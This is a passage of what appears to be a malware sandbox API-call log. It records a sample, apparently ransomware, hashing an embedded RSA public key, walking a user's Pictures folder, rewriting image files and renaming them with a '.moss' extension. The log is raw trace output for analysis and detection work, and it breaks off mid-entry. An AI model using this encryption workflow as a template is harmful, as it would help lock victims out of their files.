CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.856] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.856] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.856] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.856] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.856] GetLastError () returned 0x0 [0171.856] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.856] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.856] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.857] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.857] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.857] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.857] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.857] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3ea4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.857] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\whczvEvh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\whczvevh.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\whczvEvh.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\whczvevh.bmp.moss")) returned 1 [0171.859] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.859] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.860] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\") returned="ynvUi8OA0E 4g2YjdS\\" [0171.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0171.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50f20 [0171.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.860] PathFindFileNameW (pszPath="") returned="" [0171.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37389b0, ftCreationTime.dwHighDateTime=0x1d5e1c8, ftLastAccessTime.dwLowDateTime=0x3e0538e0, ftLastAccessTime.dwHighDateTime=0x1d5e57d, ftLastWriteTime.dwLowDateTime=0x3e0538e0, ftLastWriteTime.dwHighDateTime=0x1d5e57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.860] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\1dxa4BK.jpg") returned=".jpg" [0171.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\1dxa4BK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\1dxa4bk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.861] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=44765) returned 1 [0171.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.864] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xaeb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.864] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.865] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.865] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xaedd, lpOverlapped=0x0) returned 1 [0171.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.865] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.866] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.867] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.867] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.867] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.867] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.867] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.867] GetLastError () returned 0x0 [0171.867] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.867] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.867] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.867] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.867] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.867] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.867] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.867] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.867] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xaee0) returned 0x3b62d40 [0171.868] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50f20 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e010 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50f68 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e028 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e058 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e070 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.868] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e058 | out: hHeap=0xcd0000) returned 1 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e070 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e058 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e058 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.869] GetCurrentThreadId () returned 0x324 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4f988 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.869] GetCurrentThreadId () returned 0x324 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.869] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.869] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e058 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e070 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e040 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddb8 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.870] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e088 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e058 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e058 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e058 | out: hHeap=0xcd0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e088 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e070 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e040 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0171.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 